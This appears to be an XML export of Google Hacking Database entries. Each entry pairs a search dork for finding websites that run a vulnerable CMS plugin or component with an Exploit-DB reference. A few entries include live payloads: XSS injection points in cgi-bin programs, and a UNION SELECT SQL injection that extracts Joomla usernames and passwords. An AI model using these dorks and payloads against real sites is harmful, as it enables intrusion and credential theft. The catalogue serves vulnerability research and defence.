<textualDescription>Webboard v.2.90 beta Remote File Disclosure Vulnerability - CVE: 2009-2600: https://www.exploit-db.com/exploits/8823</textualDescription>
<query>inurl:&quot;webboard/view.php?topic=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22webboard/view.php%3Ftopic%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/8823</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2352</id>
<link>https://www.exploit-db.com/ghdb/2352</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;weblink_cat_list.php?bcat_id=&quot;</shortDescription>
<textualDescription>WHMCompleteSolution CMS sql Injection Vulnerability: https://www.exploit-db.com/exploits/10493</textualDescription>
<query>inurl:&quot;weblink_cat_list.php?bcat_id=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22weblink_cat_list.php%3Fbcat_id%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/10493</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1180</id>
<link>https://www.exploit-db.com/ghdb/1180</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;wfdownloads/viewcat.php?list=&quot;</shortDescription>
<textualDescription>XOOPS WF_Downloads (2.05) module SQL injectionThis a specific dork, that searches XOOPS sites with WF_Downloads module installed, advisory &amp; poc exploit:http://rgod.altervista.org/xoops_xpl.html</textualDescription>
<query>inurl:&quot;wfdownloads/viewcat.php?list=&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%22wfdownloads%2Fviewcat.php%3Flist%3D%22</querystring>
<edb></edb>
<date>2005-11-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>1705</id>
<link>https://www.exploit-db.com/ghdb/1705</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;whoiscart/admin/hostinginterfaces/&quot;</shortDescription>
<textualDescription>WHOISCART Scripting Vulnerability: https://www.exploit-db.com/exploits/10812</textualDescription>
<query>inurl:&quot;whoiscart/admin/hostinginterfaces/&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22whoiscart/admin/hostinginterfaces/%22</querystring>
<edb>https://www.exploit-db.com/exploits/10812</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>6661</id>
<link>https://www.exploit-db.com/ghdb/6661</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;woocommerce-exporter&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;woocommerce-exporter&quot;
# WooCommerce Store Exporter v1.7.5 Stored XSS. https://www.exploit-db.com/exploits/34424
# Date: 29/10/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:&quot;woocommerce-exporter&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;woocommerce-exporter&quot;</querystring>
<edb></edb>
<date>2020-11-06</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6126</id>
<link>https://www.exploit-db.com/ghdb/6126</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;wp-content/plugins/form-maker&quot;</shortDescription>
<textualDescription>Dork: inurl:&quot;wp-content/plugins/form-maker&quot;
Description: This google dork lists out Advisories and Vulnerabilities
regarding the form maker wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10237
Author: Abhi Chitkara
</textualDescription>
<query>inurl:&quot;wp-content/plugins/form-maker&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;wp-content/plugins/form-maker&quot;</querystring>
<edb></edb>
<date>2020-05-26</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6039</id>
<link>https://www.exploit-db.com/ghdb/6039</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;wp-content/plugins/learnpress&quot;</shortDescription>
<textualDescription>Dork: inurl:&quot;wp-content/plugins/learnpress&quot;
Description: This Google dork lists out Advisories and Vulnerabilities
about the LearnPress Plugin. Ref:
https://wpvulndb.com/vulnerabilities/10208
Author: Abhi Chitkara
</textualDescription>
<query>inurl:&quot;wp-content/plugins/learnpress&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;wp-content/plugins/learnpress&quot;</querystring>
<edb></edb>
<date>2020-05-06</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6040</id>
<link>https://www.exploit-db.com/ghdb/6040</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;wp-content/plugins/ninja-forms&quot;</shortDescription>
<textualDescription>Dork: inurl:&quot;wp-content/plugins/ninja-forms&quot;
Description: This Google dork lists out Advisories and Vulnerabilities
about the ninja forms Plugin. Ref:
https://wpvulndb.com/vulnerabilities/10200
Author: Abhi Chitkara
</textualDescription>
<query>inurl:&quot;wp-content/plugins/ninja-forms&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;wp-content/plugins/ninja-forms&quot;</querystring>
<edb></edb>
<date>2020-05-06</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6139</id>
<link>https://www.exploit-db.com/ghdb/6139</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;wp-content/plugins/siteorigin-panels&quot;</shortDescription>
<textualDescription>Dork: inurl:&quot;wp-content/plugins/siteorigin-panels&quot;
Description: This google dork lists out Advisories and Vulnerabilities
regarding the siteorigin panels wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10219
Author: Abhi Chitkara
</textualDescription>
<query>inurl:&quot;wp-content/plugins/siteorigin-panels&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;wp-content/plugins/siteorigin-panels&quot;</querystring>
<edb></edb>
<date>2020-05-27</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6959</id>
<link>https://www.exploit-db.com/ghdb/6959</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;wp-content/plugins/wp-super-edit/superedit/&quot; | inurl:&quot;wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/upload/&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;wp-content/plugins/wp-super-edit/superedit/&quot; | inurl:&quot;wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/upload/&quot;
# Wordpress Plugin WP Super Edit 2.5.4 - Remote File Upload.
# https://www.exploit-db.com/exploits/49839
# Date: 25/05/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:&quot;wp-content/plugins/wp-super-edit/superedit/&quot; | inurl:&quot;wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/upload/&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;wp-content/plugins/wp-super-edit/superedit/&quot; | inurl:&quot;wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/upload/&quot;</querystring>
<edb></edb>
<date>2021-05-25</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>1649</id>
<link>https://www.exploit-db.com/ghdb/1649</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;wp-download.php?dl_id=&quot;</shortDescription>
<textualDescription>Wordpress Plugin Download (dl_id) SQL Injection Vulnerability - CVE: 2008-1646: https://www.exploit-db.com/exploits/5326</textualDescription>
<query>inurl:&quot;wp-download.php?dl_id=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22wp-download.php%3Fdl_id%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/5326</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3275</id>
<link>https://www.exploit-db.com/ghdb/3275</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;xampp/biorhythm.php&quot;</shortDescription>
<textualDescription>XAMPP 1.7.3 multiple vulnerabilites: https://www.exploit-db.com/exploits/15370</textualDescription>
<query>inurl:&quot;xampp/biorhythm.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22xampp/biorhythm.php%22</querystring>
<edb>https://www.exploit-db.com/exploits/15370</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2776</id>
<link>https://www.exploit-db.com/ghdb/2776</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;zcat.php?id=&quot;</shortDescription>
<textualDescription>IRAN N.E.T E-commerce Group SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10350</textualDescription>
<query>inurl:&quot;zcat.php?id=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22zcat.php%3Fid%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/10350</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>5912</id>
<link>https://www.exploit-db.com/ghdb/5912</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;\wp-content\plugins\all-in-one-seo-pack&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;\wp-content\plugins\all-in-one-seo-pack&quot;
# By using this dork, sites vulnerable to all-in-one-seo-pack 3.2.7 -
Persistent Cross-Site Scripting, can be found. This dork is linked to the
following existing exploit: https://www.exploit-db.com/exploits/47425
# Date: 17/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>inurl:&quot;wp-contentpluginsall-in-one-seo-pack&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;\wp-content\plugins\all-in-one-seo-pack&quot;</querystring>
<edb></edb>
<date>2020-04-17</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6248</id>
<link>https://www.exploit-db.com/ghdb/6248</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;\wp-content\plugins\photo-gallery&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;\wp-content\plugins\photo-gallery&quot;
# WordPress Plugin Photo Gallery 1.5.34 - SQL Injection. This dork is
linked to the following existing exploit (CVE : 2019-16119) :
https://www.exploit-db.com/exploits/47371
# Date: 2020-06-09
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:&quot;wp-contentpluginsphoto-gallery&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;\wp-content\plugins\photo-gallery&quot;</querystring>
<edb></edb>
<date>2020-06-09</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6466</id>
<link>https://www.exploit-db.com/ghdb/6466</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:''com_gmapfp''</shortDescription>
<textualDescription># Google Dork: inurl:''com_gmapfp''
# Joomla! Component GMapFP 3.30 - Arbitrary File Upload. This dork is
linked to the following existing exploit:
https://www.exploit-db.com/exploits/48248
# Date: 31/07/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:''com_gmapfp''</query>
<querystring>https://www.google.com/search?q=inurl:''com_gmapfp''</querystring>
<edb></edb>
<date>2020-08-06</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>1319</id>
<link>https://www.exploit-db.com/ghdb/1319</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:*.exe ext:exe inurl:/*cgi*/</shortDescription>
<textualDescription>a cgi-bin executables xss/html injection miscellanea:some examples:inurl:keycgi.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/keycgi.exe?cmd=download&amp;product=&quot;&gt;[XSS HERE] inurl:wa.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/wa.exe?SUBED1=&quot;&gt;[XSS HERE] inurl:mqinterconnect.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/mqinterconnect.exe?poi1iconid=11111&amp;poi1streetaddress=&quot;&gt;[XSS HERE]&amp;poi1city=city&amp;poi1state=OK inurl:as_web.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/as_web.exe?[XSS HERE]+B+wishes inurl:webplus.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/webplus.exe?script=&quot;&gt;[XSS HERE] inurl:odb-get.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/odb-get.exe?WIT_template=&quot;&gt;[XSS HERE]&amp;WIT_oid=what::what::1111&amp;m=1&amp;d= inurl:hcapstat.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/hcapstat.exe?CID=&quot;&gt;[XSS HERE]&amp;GID=&amp;START=110&amp;SBN=OFF&amp;ACTION=Submit inurl:webstat.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/webstat.exe?A=X&amp;RE=&quot;&gt;[XSS HERE] inurl:cows.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/cows/cows.exe?cgi_action=tblBody&amp;sort_by=&quot;&gt;[XSS HERE] inurl:findifile.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/findfile.exe?SEEKER=&quot;&gt;[XSS HERE]&amp;LIMIT=50&amp;YEAR=&quot;&gt; inurl:baserun.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/baserun.exe?_cfg=&quot;&gt;[XSS HERE] inurl:Users.exe ext:exe inurl:/*cgi*/ html injection: http://[target]/[path]/cgi-bin/Users.exe?SITEID=[html]</textualDescription>
<query>inurl:*.exe ext:exe inurl:/*cgi*/</query>
<querystring>https://www.google.com/search?hl=it&amp;q=inurl%3A*.exe+ext%3Aexe+inurl%3A%2F*cgi*%2F&amp;meta=&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2006-03-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>2852</id>
<link>https://www.exploit-db.com/ghdb/2852</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:.asp? Powered by Comersus ASP Shopping Cart</shortDescription>
<textualDescription>Comersus ASP Shopping Cart (DD/XSS) Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/7259</textualDescription>
<query>inurl:.asp? Powered by Comersus ASP Shopping Cart</query>
<querystring>https://www.google.com/search?q=inurl%3A.asp%3F+++Powered+by+Comersus+ASP+Shopping+Cart</querystring>
<edb>https://www.exploit-db.com/exploits/7259</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>5901</id>
<link>https://www.exploit-db.com/ghdb/5901</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/?op=registration</shortDescription>
<textualDescription># Google Dork: inurl:/?op=registration
# By using this dork, sites vulnerable to Xfilesharing 2.5.1 - Arbitrary
File Upload, can be found. This dork is linked to the following existing
exploit: https://www.exploit-db.com/exploits/47659
# Date: 07/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>inurl:/?op=registration</query>
<querystring>https://www.google.com/search?q=inurl:/?op=registration</querystring>
<edb></edb>
<date>2020-04-16</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6812</id>
<link>https://www.exploit-db.com/ghdb/6812</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/calendar/calendar_form.php</shortDescription>
<textualDescription># Google Dork: inurl:/calendar/calendar_form.php
# Triconsole 3.75 - Reflected XSS. CVE: 2021-27330.
# https://www.exploit-db.com/exploits/49597
# Date: 1/3/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:/calendar/calendar_form.php</query>
<querystring>https://www.google.com/search?q=inurl:/calendar/calendar_form.php</querystring>
<edb></edb>
<date>2021-03-01</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6741</id>
<link>https://www.exploit-db.com/ghdb/6741</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/cgi-bin/manlist?section</shortDescription>
<textualDescription># Google Dork: inurl:/cgi-bin/manlist?section
# SCO Openserver 5.0.7 - 'section' Reflected XSS. CVE : CVE-2020-25495.
# https://www.exploit-db.com/exploits/49300
# SCO Openserver 5.0.7 - 'outputform' Command Injection. CVE : CVE-2020-25494
# https://www.exploit-db.com/exploits/49301
# Date: 21/12/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:/cgi-bin/manlist?section</query>
<querystring>https://www.google.com/search?q=inurl:/cgi-bin/manlist?section</querystring>
<edb></edb>
<date>2021-01-05</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5695</id>
<link>https://www.exploit-db.com/ghdb/5695</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/cmsinstall/install ext:aspx</shortDescription>
<textualDescription># Exploit Title: Google Dork for Kentico CVE-201717736
# Google Dork: inurl:/cmsinstall/install ext:aspx
# Date: January 21, 2020
# Exploit Author: Nathan Potter
# Version: Kentico 8.X, </textualDescription>
<query>inurl:/cmsinstall/install ext:aspx</query>
<querystring>https://www.google.com/search?q=inurl:/cmsinstall/install ext:aspx</querystring>
<edb></edb>
<date>2020-01-21</date>
<author>Nathan Potter</author>
</entry>
<entry>
<id>1828</id>
<link>https://www.exploit-db.com/ghdb/1828</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/component/jeeventcalendar/</shortDescription>
<textualDescription>Joomla JE Event Calendar LFI Vulnerability: https://www.exploit-db.com/exploits/14062</textualDescription>
<query>inurl:/component/jeeventcalendar/</query>
<querystring>https://www.google.com/search?q=inurl:/component/jeeventcalendar/</querystring>
<edb>https://www.exploit-db.com/exploits/14062</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2808</id>
<link>https://www.exploit-db.com/ghdb/2808</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/component/jesectionfinder/</shortDescription>
<textualDescription>Joomla Component JE Section Finder LFI Vulnerability - CVE: 2010-2680: https://www.exploit-db.com/exploits/14064</textualDescription>
<query>inurl:/component/jesectionfinder/</query>
<querystring>https://www.google.com/search?q=inurl:/component/jesectionfinder/</querystring>
<edb>https://www.exploit-db.com/exploits/14064</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2869</id>
<link>https://www.exploit-db.com/ghdb/2869</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/components/je-media-player.html?</shortDescription>
<textualDescription>Joomla JE Media Player Component LFI Vulnerability: https://www.exploit-db.com/exploits/14060</textualDescription>
<query>inurl:/components/je-media-player.html?</query>
<querystring>https://www.google.com/search?q=inurl%3A%2Fcomponents%2Fje-media-player.html%3F</querystring>
<edb>https://www.exploit-db.com/exploits/14060</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2991</id>
<link>https://www.exploit-db.com/ghdb/2991</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/com_chronocontact</shortDescription>
<textualDescription>Joomla Component ChronoForms 2.3.5 RFI Vulnerabilities - CVE: 2008-0567: https://www.exploit-db.com/exploits/5020</textualDescription>
<query>inurl:/com_chronocontact</query>
<querystring>https://www.google.com/search?q=inurl:/com_chronocontact</querystring>
<edb>https://www.exploit-db.com/exploits/5020</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2404</id>
<link>https://www.exploit-db.com/ghdb/2404</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/downlot.php?file=</shortDescription>
<textualDescription>Lokomedia CMS (sukaCMS) Local File Disclosure Vulnerability - CVE: 2010-2018: https://www.exploit-db.com/exploits/12651</textualDescription>
<query>inurl:/downlot.php?file=</query>
<querystring>https://www.google.com/search?q=inurl:/downlot.php%3Ffile%3D</querystring>
<edb>https://www.exploit-db.com/exploits/12651</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2308</id>
<link>https://www.exploit-db.com/ghdb/2308</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/hbcms/php/</shortDescription>
<textualDescription>HB CMS 1.7 SQL Injection: https://www.exploit-db.com/exploits/9835</textualDescription>
<query>inurl:/hbcms/php/</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=inurl:/hbcms/php/</querystring>
<edb>https://www.exploit-db.com/exploits/9835</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>6829</id>
<link>https://www.exploit-db.com/ghdb/6829</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/ics?tool=search</shortDescription>
<textualDescription># Dork: inurl:/ics?tool=search
# Dork To Find the WebApps Vulnerable for CVE-2021-26723
</textualDescription>
<query>inurl:/ics?tool=search</query>
<querystring>https://www.google.com/search?q=inurl:/ics?tool=search</querystring>
<edb></edb>
<date>2021-03-16</date>
<author>avi sawade</author>
</entry>
<entry>
<id>4386</id>
<link>https://www.exploit-db.com/ghdb/4386</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/index.php?option=com_artforms</shortDescription>
<textualDescription># Exploit Title : ----------- :Joomla &quot;com_artforms&quot; component SQL Injection
# Author : ----------------- : importantTR
# Google Dork : --------- : -inurl:/index.php?option=com_artforms
# Date : -------------------- : 20/01/2017
# Platform : --------------- : Joomla
########## 1-SQL Injection ##########
index.php?option=com_artforms&amp;task=ferforms&amp;viewform=[SQLi]
##### SQLi Parameter :
/index.php?option=com_artforms&amp;task=ferforms&amp;viewform=-1%20UNION%20SELECT%201,concat_ws%280x4a,username,password%29,3,4,5,6%20from%20jos_users%23
########## AYYILDIZ TIM ##########
https://www.exploit-db.com/exploits/14263/</textualDescription>
<query>inurl:/index.php?option=com_artforms</query>
<querystring>https://www.google.com/search?q=inurl:/index.php?option=com_artforms</querystring>
<edb>https://www.exploit-db.com/exploits/14263</edb>
<date>2017-01-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>2080</id>
<link>https://www.exploit-db.com/ghdb/2080</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/index.php?option=com_otzivi</shortDescription>
<textualDescription>Joomla Component com_otzivi Blind SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10966</textualDescription>
<query>inurl:/index.php?option=com_otzivi</query>
<querystring>https://www.google.com/search?q=inurl:/index.php%3Foption%3Dcom_otzivi</querystring>
<edb>https://www.exploit-db.com/exploits/10966</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2451</id>
<link>https://www.exploit-db.com/ghdb/2451</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/index.php?option=com_yellowpages</shortDescription>
<textualDescription>Joomla Yellowpages SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14592</textualDescription>
<query>inurl:/index.php?option=com_yellowpages</query>
<querystring>https://www.google.com/search?q=inurl:/index.php%3Foption%3Dcom_yellowpages</querystring>
<edb>https://www.exploit-db.com/exploits/14592</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2479</id>
<link>https://www.exploit-db.com/ghdb/2479</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/infusions/e_cart</shortDescription>
<textualDescription>PHP-Fusion Mod E-Cart 1.3 (items.php CA) SQL Injection Vulnerability - CVE: 2009-0832: https://www.exploit-db.com/exploits/7698</textualDescription>
<query>inurl:/infusions/e_cart</query>
<querystring>https://www.google.com/search?q=inurl:/infusions/e_cart</querystring>
<edb>https://www.exploit-db.com/exploits/7698</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2417</id>
<link>https://www.exploit-db.com/ghdb/2417</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/jobsearchengine/</shortDescription>
<textualDescription>I-Net MLM Script Engine SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14080</textualDescription>
<query>inurl:/jobsearchengine/</query>
<querystring>https://www.google.com/search?q=inurl:/jobsearchengine/</querystring>
<edb>https://www.exploit-db.com/exploits/14080</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3026</id>
<link>https://www.exploit-db.com/ghdb/3026</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/jobsearchengine/</shortDescription>
<textualDescription>i-netsolution Job Search Engine SQL Injection Vulnerability - CVE: 2010-2611: https://www.exploit-db.com/exploits/14079</textualDescription>
<query>inurl:/jobsearchengine/</query>
<querystring>https://www.google.com/search?q=inurl:/jobsearchengine/</querystring>
<edb>https://www.exploit-db.com/exploits/14079</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3199</id>
<link>https://www.exploit-db.com/ghdb/3199</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/jobsearchengine/</shortDescription>
<textualDescription>I-net Multi User Email Script SQLi Vulnerability: https://www.exploit-db.com/exploits/14095</textualDescription>
<query>inurl:/jobsearchengine/</query>
<querystring>https://www.google.com/search?q=inurl:/jobsearchengine/</querystring>
<edb>https://www.exploit-db.com/exploits/14095</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3206</id>
<link>https://www.exploit-db.com/ghdb/3206</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/jobsearchengine/</shortDescription>
<textualDescription>I-net Multi User Email Script SQLi Vulnerability: https://www.exploit-db.com/exploits/14129</textualDescription>
<query>inurl:/jobsearchengine/</query>
<querystring>https://www.google.com/search?q=inurl:/jobsearchengine/</querystring>
<edb>https://www.exploit-db.com/exploits/14129</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3209</id>
<link>https://www.exploit-db.com/ghdb/3209</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/jobsearchengine/</shortDescription>
<textualDescription>I-net Multi User Email Script SQLi Vulnerability: https://www.exploit-db.com/exploits/14114</textualDescription>
<query>inurl:/jobsearchengine/</query>
<querystring>https://www.google.com/search?q=inurl:/jobsearchengine/</querystring>
<edb>https://www.exploit-db.com/exploits/14114</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3162</id>
<link>https://www.exploit-db.com/ghdb/3162</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/macgurublog_menu/</shortDescription>
<textualDescription>e107 Plugin BLOG Engine 2.2 (rid) Blind SQL Injection Vulnerability - CVE: 2008-2455: https://www.exploit-db.com/exploits/5604</textualDescription>
<query>inurl:/macgurublog_menu/</query>
<querystring>https://www.google.com/search?q=inurl:/macgurublog_menu/</querystring>
<edb>https://www.exploit-db.com/exploits/5604</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3243</id>
<link>https://www.exploit-db.com/ghdb/3243</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/modules/camportail/</shortDescription>
<textualDescription>XOOPS Module Camportail 1.1 (camid) Remote SQL Injection - CVE: 2007-1808: https://www.exploit-db.com/exploits/3629</textualDescription>
<query>inurl:/modules/camportail/</query>
<querystring>https://www.google.com/search?q=inurl:/modules/camportail/</querystring>
<edb>https://www.exploit-db.com/exploits/3629</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3533</id>
<link>https://www.exploit-db.com/ghdb/3533</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/modules/debaser/</shortDescription>
<textualDescription>XOOPS Module debaser 0.92 (genre.php) BLIND SQL Injection- CVE: 2007-1805: https://www.exploit-db.com/exploits/3630</textualDescription>
<query>inurl:/modules/debaser/</query>
<querystring>https://www.google.com/search?q=inurl:/modules/debaser/</querystring>
<edb>https://www.exploit-db.com/exploits/3630</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3231</id>
<link>https://www.exploit-db.com/ghdb/3231</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/modules/kshop/</shortDescription>
<textualDescription>XOOPS Module Kshop 1.17 (id) Remote SQL Injectio - CVE: 2007-1810: https://www.exploit-db.com/exploits/3626</textualDescription>
<query>inurl:/modules/kshop/</query>
<querystring>https://www.google.com/search?q=inurl:/modules/kshop/</querystring>
<edb>https://www.exploit-db.com/exploits/3626</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3521</id>
<link>https://www.exploit-db.com/ghdb/3521</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/modules/lykos_reviews/</shortDescription>
<textualDescription>XOOPS Module Lykos Reviews 1.00 (index.php) SQL Injection - CVE: 2007-1817: https://www.exploit-db.com/exploits/3618</textualDescription>
<query>inurl:/modules/lykos_reviews/</query>
<querystring>https://www.google.com/search?q=inurl:/modules/lykos_reviews/</querystring>
<edb>https://www.exploit-db.com/exploits/3618</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2101</id>
<link>https://www.exploit-db.com/ghdb/2101</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/modules/Partenaires/clic.php?id=</shortDescription>
<textualDescription>Nuked-Klan Module Partenaires NK 1.5 Blind Sql Injection: https://www.exploit-db.com/exploits/14556</textualDescription>
<query>inurl:/modules/Partenaires/clic.php?id=</query>
<querystring>https://www.google.com/search?q=inurl:/modules/Partenaires/clic.php%3Fid%3D</querystring>
<edb>https://www.exploit-db.com/exploits/14556</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3535</id>
<link>https://www.exploit-db.com/ghdb/3535</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/modules/rmgallery/</shortDescription>
<textualDescription>XOOPS Module RM+Soft Gallery 1.0 BLIND SQL Injection - CVE: 2007-1806: https://www.exploit-db.com/exploits/3633</textualDescription>
<query>inurl:/modules/rmgallery/</query>
<querystring>https://www.google.com/search?q=inurl:/modules/rmgallery/</querystring>
<edb>https://www.exploit-db.com/exploits/3633</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
